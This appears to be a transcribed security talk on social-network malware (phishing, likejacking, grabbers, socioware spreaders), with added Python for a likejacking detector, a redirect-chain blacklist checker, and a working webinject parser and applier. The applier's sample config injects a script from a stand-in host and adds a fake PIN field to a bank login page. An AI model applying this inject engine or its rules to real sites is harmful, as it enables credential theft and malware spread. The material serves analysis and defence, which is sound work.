GraphSummit Singapore | The Art of the Possible with Graph - Q2 2024
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 

Emerging Trends in Online Social Networks Malware

  • 6. OSN Malware : Features
    - Conduct operations in a deceptive manner
    - Steal identities and sensitive information
    - Breach privacy
    - Harness the power of the inherent design of OSNs
    - Exploit the built-in design model to trigger attacks
    - Automated in nature
  • 7. Emerging Trends : History to Now…
    - Phishing/Spam
    - OSN Scams
    - LikeJacking/ClickJacking
    - Rogue Applications and Profiles (Facebook, Twitter, etc.)
    - Sponsored Advertisements and Malvertisements
    - Worms
    - Socioware
  • 8. Users are the Assets !
    - OSN user base: Facebook – 1.05 billion
    - Refer: Facebook quarterly earnings, Q4 2012 investor slide deck: http://www.scribd.com/doc/123034877/Facebook-Q4-2012-Investor-Slide-Deck
  • 9. Users are the Assets !
    - OSN user base: Twitter – 465 million, and recently reached 500 million
    - Refer: http://blog.sironaconsulting.com
  • 10. Analytics !
    - Barracuda Study (2012): http://www.barracudalabs.com/fbinfographic/
  • 11. OSN Chain Infection !
    - Chain Exploitation—Social Networks Malware: http://www.isaca.org/Journal/Past-Issues/2011/Volume-1/Pages/Chain-Exploitation-Social-Networks-Malware.aspx
  • 12. Online Social Network Malware - Trends
  • 13. Trend (1) – Phishing (Facebook)
    - Old-school tactic, but amazingly it still works
    - Brand-name manipulation and social engineering
    - Exploits ignorance and doubt among OSN users
    - Extensively used for conducting drive-by-download attacks
  • 14. Trend (1) – Phishing (Twitter)
  • 15. Trend (1) – Spamming (Twitter)
    - Used in survey scams
    - URL shortener services are very fruitful for the attacker: hiding targets, serving exploits, redirecting on the fly
  • 16. Trend (2) – Scams
    - Illegitimate surveys and polls
    - Spreading malware
    - Stealing users' information
  • 17. Trend (3) – Fake Profiles
    Note: a number of fake Facebook profiles have existed for more than a year.
  • 18. Trend (4) – Malicious Applications
  • 19. Trend (5) – Malvertisement
  • 20. Trend (6) – Worms
    Koobface (2009-2010)
    - Injects malicious content into wall posts; hoax warnings
    - Sends emails to the inboxes of registered Facebook users
    - Chain infection to distribute the Koobface malware to a large set of users
    - Also used stolen Facebook credentials for malicious purposes
    Likejacking Worm (2010-2012)
    - Injects malicious links
    - Raises ratings by triggering unauthorized likes
  • 21. Trend (6) – Worms (cont…)
    Lily Jade (2012)
    - Exploits the Crossrider web API to build a plugin that attacks different browsers
    - Uses jQuery to send malicious messages
    Ramnit Worm (2010-2012)
    - Stolen Facebook account credentials are used to deliver malicious messages through compromised accounts
  • 22. Trend (7) – Likejacking/Clickjacking
    - Injecting malicious links with likes
    - Manipulating the implementation of the Like functionality
    - Very effective in tricking users into following the likes
    - Earlier used to spread malware, but now it has become a legitimate business model. Amazing!
    - For $5, one can buy a number of likes!
  • 23. LikeJacking/Clickjacking Demo (Facebook)
    - This demo shows how LikeJacking was conducted earlier to trigger infections on Facebook
    - It worked when Facebook did not implement any confirmation button
    - The newly deployed code restricts the active implementation of this attack, but it is not a complete solution
    - A new variant of LikeJacking code can be expected in the near future
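The classic likejacking page described in the demo works by framing the Facebook Like button, making the iframe invisible with CSS and positioning it over a decoy element (a "play video" button, for instance), so the victim's click lands on the Like widget. Because the Like plugin is designed to be framed, anti-framing headers cannot stop this on Facebook's side; that is why the confirmation step the slide mentions was needed. What a scanner or a takedown team can do is flag pages that frame the Like plugin and hide it. The heuristic below is an added example written for this page, not code from the talk or from Facebook; it only inspects inline style attributes (hiding done through a stylesheet or JavaScript is out of scope), and the two sample pages, the `.invalid` domains and the score threshold are constructed for illustration.

```python
"""Heuristic detector for likejacking pages: a Facebook Like-button iframe
hidden with inline CSS and overlaid on a visible decoy. Stdlib only."""
import re
from html.parser import HTMLParser

# The documented iframe form of the Like plugin
LIKE_IFRAME = re.compile(r"facebook\.com/plugins/like\.php", re.I)

# Inline-style properties that make the framed button invisible ...
HIDING_RULES = (
    re.compile(r"opacity\s*:\s*0(\.0+)?(?![\d.])"),        # opacity:0, not 0.5
    re.compile(r"filter\s*:\s*alpha\(opacity\s*=\s*0\)"),  # legacy IE syntax
    re.compile(r"visibility\s*:\s*hidden"),
)
# ... and properties that let it sit on top of the decoy
OVERLAY_RULES = (
    re.compile(r"position\s*:\s*(absolute|fixed)"),
    re.compile(r"z-index\s*:\s*\d+"),
)


class _IframeCollector(HTMLParser):
    """Collect the attribute dict of every <iframe> in the document."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))


def score_iframe(attrs):
    """Score one iframe: 0 if it is not the Like plugin, otherwise 1 plus 2
    per hiding rule and 1 per overlay rule that its inline style matches."""
    src = attrs.get("src") or ""
    if not LIKE_IFRAME.search(src):
        return 0, []
    style = (attrs.get("style") or "").lower()
    score, reasons = 1, ["like-button iframe"]
    for rule in HIDING_RULES:
        if rule.search(style):
            score, reasons = score + 2, reasons + ["hidden: " + rule.pattern]
    for rule in OVERLAY_RULES:
        if rule.search(style):
            score, reasons = score + 1, reasons + ["overlay: " + rule.pattern]
    return score, reasons


def find_likejacking(html, threshold=3):
    """Return the Like iframes whose score reaches the threshold, i.e. any
    Like button that is hidden; a visible, plainly embedded button scores 1."""
    parser = _IframeCollector()
    parser.feed(html)
    hits = []
    for attrs in parser.iframes:
        score, reasons = score_iframe(attrs)
        if score >= threshold:
            hits.append({"src": attrs.get("src"), "score": score, "reasons": reasons})
    return hits


# Constructed sample pages (not captured from a real site)
SAMPLE_LIKEJACK = (
    '<html><body><h1>Shocking video!</h1>'
    '<button id="bait">Click to play</button>'
    '<iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fbait.invalid%2F"'
    ' style="position:absolute; top:12px; left:10px; opacity:0; z-index:10"></iframe>'
    '</body></html>'
)
SAMPLE_BENIGN = (
    '<html><body><p>Like our page:</p>'
    '<iframe src="https://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fexample.com%2F"'
    ' style="border:none; width:450px; height:80px"></iframe>'
    '<iframe src="https://www.youtube.com/embed/abc" style="opacity:0"></iframe>'
    '</body></html>'
)

if __name__ == "__main__":
    for hit in find_likejacking(SAMPLE_LIKEJACK):
        print(hit["score"], hit["src"], hit["reasons"])
```

The hidden YouTube iframe in the benign page is deliberately ignored: only the Like plugin is scored, so the detector reports hidden Like buttons rather than every invisible frame on the web.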
  • 24. Trend (8) – Identity Stealing (Grabbers)
    - Stealing OSN-specific user credentials
    - Hooks the browser to capture all the HTTP POST requests used for submitting forms
    - HTTP POST requests carry account credentials
    - OSN-specific account credentials were used earlier for building worms; example: Koobface
    - Details on the form-grabbing technique: http://www.virusbtn.com/virusbulletin/archive/2011/11/vb201111-form-grabbing
  • 25. OSN Grabber (Demo)
    - A bot with built-in functionality to capture OSN data is installed in the testing environment
    - The Facebook website is opened and credentials are provided
    - The bot steals the user credentials
  • 26. Trend (9) – Socioware
    Socioware: Online Social Networks Malware
    - Malware targeting OSNs from end-user machines
    - Malware exploiting OSN functionality in an automated manner
    - Virtually turns your friends into frenemies
    - Exploits users by compromising their identity and privacy
    - Completely deceptive in nature
  • 27. Trend (9) – Inside Socioware
    Socioware
    - A class of malware explicitly used to spread infections across different OSNs (Facebook, Twitter, etc.)
    - Primarily developed as built-in components of bots
    - Named SPREADERS in the underground economy
    - Explicitly used for building OSN worms
    - Subverts the capabilities of OSNs to distribute malware to large sections of users
    How?
    - Based on the Man-in-the-Browser (MitB) paradigm
    - Triggers infections from already-infected machines
    - Browsers are hooked and OSN web pages are injected
    - Exploits the trust model that exists between users
  • 28. Understanding Socioware – Targeting Facebook Online Chat
  • 29. Facebook Chat – Infections !
  • 30. Spreaders – Distribution !
    - Creating a malicious Facebook application and embedding a Java applet that triggers a drive-by download to install the spreader
    - Using an existing botnet to load spreaders onto already-infected machines
    - Pay-per-infection (PPI) with browser exploit packs (BEPs) to infect websites that distribute spreaders
    - Using USB devices to distribute spreaders physically
  • 31. Spreaders – Components !
    - Executable (injection engine): the primary logic file that spreads malicious messages
    - Status notification component: the executable reports the status of the injection (success/failure)
    - Link storage component: stores the different injections (URLs) to be injected by the executable
    - Time interval component: logic that decides when to inject the malicious link, based on timing
  • 32. Spreaders – Internal Design
    - Step 1 – Installed on the end user's machine
    - Step 2 – Hooks browser libraries and controls the HTTP communication channel
    - Step 3 – Remains dormant and starts a monitoring engine to detect OSN surfing through browsers
    - Step 4 – On successful detection, triggers internal logic to find a pattern in the web page
    - Step 5 – Reads the malicious message from a file (or internally) for injection
    - Step 6 – Triggers the injection and reports the state (success or failure) to the C&C
    - Step 7 – Deactivates itself for a few minutes and starts infecting again
  • 33. Spreaders Demo
    - The spreader is installed in a controlled virtual environment
    - The Facebook website is opened and credentials are provided
    - Facebook chat is activated to send messages to friends
    - The spreader injects malicious messages after a given time interval
  • 34. Socioware - Universal Web Injects
    - Automated way to inject unauthorized content into HTTP responses
    - The technique works by hijacking the communication channel of browsers and manipulating the low-level HTTP protocol libraries used by browsers
    - Primarily aimed at stealing information from banking websites on end-user machines
  • 35. Socioware - Universal Web Injects
    - set_url [target webpage URL] GP: sets the target web page to inject; "*" in the URL is a wildcard, and the trailing flags select the HTTP methods to match (G = GET, P = POST)
    - data_before / data_end: the content that must appear in the web page before the injected content
    - data_inject / data_end: the data to inject into the web page
    - data_after / data_end: the content that must appear in the web page after the injected content
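Steps 4 to 6 of the spreader design above (find a pattern in the page, read the message to inject, inject it and report success or failure) are exactly what the universal webinject syntax encodes, which is why the same injection engines serve both banking fraud and OSN spreading. The following is an added example written for this page, not the talk's code and not from any real bot: a parser for the set_url / data_before / data_inject / data_after / data_end format as commonly documented for ZeuS-family configs, plus a function that applies the rules to a response body the way an injecting bot would. Assumptions: only the G and P flags are interpreted, a rule with neither data_before nor data_after is skipped, rules are applied in config order, and the config and pages below are constructed (.invalid domains) for illustration.

```python
"""Parse a ZeuS/SpyEye-style 'universal web inject' config and apply it to an
HTTP response body, as the injection engine of a spreader/bot does.
Analysis tooling, stdlib only."""
import re
from dataclasses import dataclass


@dataclass
class Inject:
    url_mask: str        # set_url pattern; '*' is a wildcard
    flags: str           # HTTP methods the rule applies to: G=GET, P=POST
    before: str = ""     # data_before: content that must precede the injection
    inject: str = ""     # data_inject: content to insert (empty = delete)
    after: str = ""      # data_after: content that must follow the injection


def parse_webinjects(text):
    """Each set_url line starts a rule; the data_before/data_inject/data_after
    blocks that follow belong to it, each ending at its data_end line.
    Lines starting with ';' are comments."""
    rules, current, section, buf = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:                       # inside a data_* block
            if line == "data_end":
                setattr(current, section, "\n".join(buf).strip())
                section, buf = None, []
            else:
                buf.append(raw.rstrip())
            continue
        if line.startswith("set_url"):
            parts = line.split()
            if len(parts) < 2:
                raise ValueError("set_url without a URL mask: %r" % raw)
            flags = parts[2].upper() if len(parts) > 2 else "GP"
            current = Inject(url_mask=parts[1], flags=flags)
            rules.append(current)
        elif line in ("data_before", "data_inject", "data_after"):
            if current is None:
                raise ValueError("%s before any set_url" % line)
            section = line[len("data_"):]              # before / inject / after
        elif line and not line.startswith(";"):
            raise ValueError("unexpected line: %r" % raw)
    if section is not None:
        raise ValueError("unterminated data_%s block" % section)
    return rules


def _mask_re(mask):
    """'*' matches anything, newlines included; everything else is literal."""
    return re.compile(".*?".join(re.escape(p) for p in mask.split("*")), re.S)


def apply_injects(rules, method, url, body):
    """Rewrite one response body. Returns (new_body, applied_rule_indexes);
    the index list is what a bot reports to its C&C as success/failure."""
    applied = []
    for i, rule in enumerate(rules):
        if method[:1].upper() not in rule.flags:
            continue
        if not _mask_re(rule.url_mask).fullmatch(url):
            continue
        start = end = None
        if rule.before:
            m = _mask_re(rule.before).search(body)
            if not m:
                continue                       # anchor missing: rule fails
            start = m.end()
        if rule.after:
            m = _mask_re(rule.after).search(body, start or 0)
            if not m:
                continue
            end = m.start()
        if start is None and end is None:
            continue          # assumption: a rule with no anchor is skipped
        start = end if start is None else start  # after-only: insert before it
        end = start if end is None else end      # before-only: insert after it
        body = body[:start] + rule.inject + body[end:]
        applied.append(i)
    return body, applied


# Constructed config: an OSN rule planting a spreader script beside the chat
# box, then two banking rules (add a PIN field; blank out a warning).
SAMPLE_CONFIG = """
; constructed for this example, not a real campaign
set_url https://www.facebook.com/* GP
data_before
<div class="chat-input">
data_end
data_inject
<script src="https://spreader.invalid/inject.js"></script>
data_end
data_after
data_end

set_url https://*.bank.invalid/login* G
data_before
<input type="password"*>
data_end
data_inject
<input type="text" name="atm_pin" placeholder="ATM PIN">
data_end
data_after
data_end

set_url https://*.bank.invalid/login* GP
data_before
<p class="warning">
data_end
data_inject
data_end
data_after
</p>
data_end
"""

SAMPLE_LOGIN = ('<form action="/login" method="post">\n'
                '<p class="warning">Never enter your ATM PIN on this site.</p>\n'
                '<input type="text" name="user">\n'
                '<input type="password" name="pass">\n'
                '<button>Sign in</button>\n</form>')

if __name__ == "__main__":
    rules = parse_webinjects(SAMPLE_CONFIG)
    print(apply_injects(rules, "GET", "https://online.bank.invalid/login", SAMPLE_LOGIN)[0])
```

Running it on the sample login page adds the fake PIN field right after the password input and empties the warning paragraph, while the same page fetched with POST only loses the warning because the PIN rule is GET-only. The third rule shows why an empty data_inject matters: with both anchors set it deletes whatever lies between them, which is how injects hide balance changes or security notices.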
  • 36. Socioware - Universal Web Injects
  • 37. Facebook Built-in Protection
    Immune System
    - User feedback on the channel that the malware uses as a launchpad
    - Based on a message classifier that identifies a user as infected when it marks their messages as shady, combined with feedback provided by the user's friends
    - User marking in conjunction with URL characteristics and features
    - Refer: http://research.microsoft.com/en-us/projects/ldg/a10-stein.pdf
    Traffic Analyzer
    - Crawling every possible URL
    - Resolving DNS entries and checking against blacklists
    - This also requires resolving URL shorteners, since the shortened link itself is rarely the listed domain
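The traffic analyzer described above only works if the shortened link is followed all the way: a blacklist check on `sh.invalid/aB3` sees nothing, while the chain behind it may pass through two redirectors before landing on the listed host. The following is an added example, not Facebook's code and not from the talk, of the hop-by-hop expansion a practitioner would write: every hop is checked against the blacklist, relative Location headers are resolved, and redirect loops and over-long chains are reported instead of being followed forever. Network access is behind a `fetch` callback so the constructed redirect map (all `.invalid` hosts) runs offline; in production the callback must request each URL without auto-following redirects.

```python
"""Shortener-aware blacklist check: follow HTTP redirects one hop at a time
and test every hop, not just the final landing page. Stdlib only."""
from urllib.parse import urljoin, urlsplit

MAX_HOPS = 10
REDIRECT_CODES = (301, 302, 303, 307, 308)


def host_matches(host, blacklist):
    """True if host equals a blacklisted domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    for bad in blacklist:
        bad = bad.lower()
        if host == bad or host.endswith("." + bad):
            return True
    return False


def expand_and_check(url, fetch, blacklist, max_hops=MAX_HOPS):
    """Return {'verdict', 'hit', 'chain'} for url.

    fetch(url) -> (status_code, location_header_or_None) and must not follow
    redirects itself. Verdicts: 'blacklisted' (hit = the offending hop),
    'clean', 'redirect-loop' (hit = the repeated URL) or 'too-many-hops'."""
    chain, seen, current = [url], {url}, url
    for _ in range(max_hops):
        host = urlsplit(current).hostname or ""
        if host_matches(host, blacklist):
            return {"verdict": "blacklisted", "hit": current, "chain": chain}
        status, location = fetch(current)
        if status not in REDIRECT_CODES or not location:
            return {"verdict": "clean", "hit": None, "chain": chain}
        nxt = urljoin(current, location)        # Location may be relative
        if nxt in seen:
            return {"verdict": "redirect-loop", "hit": nxt, "chain": chain}
        seen.add(nxt)
        chain.append(nxt)
        current = nxt
    return {"verdict": "too-many-hops", "hit": None, "chain": chain}


# Constructed redirect map standing in for the network (not real services)
SAMPLE_REDIRECTS = {
    "http://sh.invalid/aB3": (301, "http://t.invalid/r?u=1"),
    "http://t.invalid/r?u=1": (302, "/landing"),
    "http://t.invalid/landing": (302, "http://cdn.payload.invalid/x.exe"),
    "http://sh.invalid/loop1": (302, "http://sh.invalid/loop2"),
    "http://sh.invalid/loop2": (302, "http://sh.invalid/loop1"),
    "http://sh.invalid/ok": (301, "https://example.com/"),
}
BLACKLIST = ["payload.invalid"]


def sample_fetch(url):
    """Offline stand-in for an HTTP HEAD that does not follow redirects."""
    return SAMPLE_REDIRECTS.get(url, (200, None))


if __name__ == "__main__":
    for short in ("http://sh.invalid/aB3", "http://sh.invalid/loop1", "http://sh.invalid/ok"):
        result = expand_and_check(short, sample_fetch, BLACKLIST)
        print(result["verdict"], " -> ".join(result["chain"]))
```

Two limits worth knowing when deploying this: shorteners and landing pages that redirect with JavaScript or a meta refresh are invisible to header-only expansion, and a campaign can serve different redirects to a crawler than to a logged-in browser, so the chain should also be re-checked at the time a user actually clicks.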
  • 38. Point to Ponder !
    Why are end users and client-side software still the priority targets?
  • 39. Future !
    - OSNs will remain the centralized target for distributing malware
    - The trend of automated infections against OSNs will continue
    - Significant increase in socioware-based crimeware services
    - Possibility of advanced likejacking attacks
    - Socioware attacking mobile platforms
  • 41. Thanks !
    - To all my team members
    - IOActive for its continuous support
    - The Secure 360 team for giving me an opportunity to speak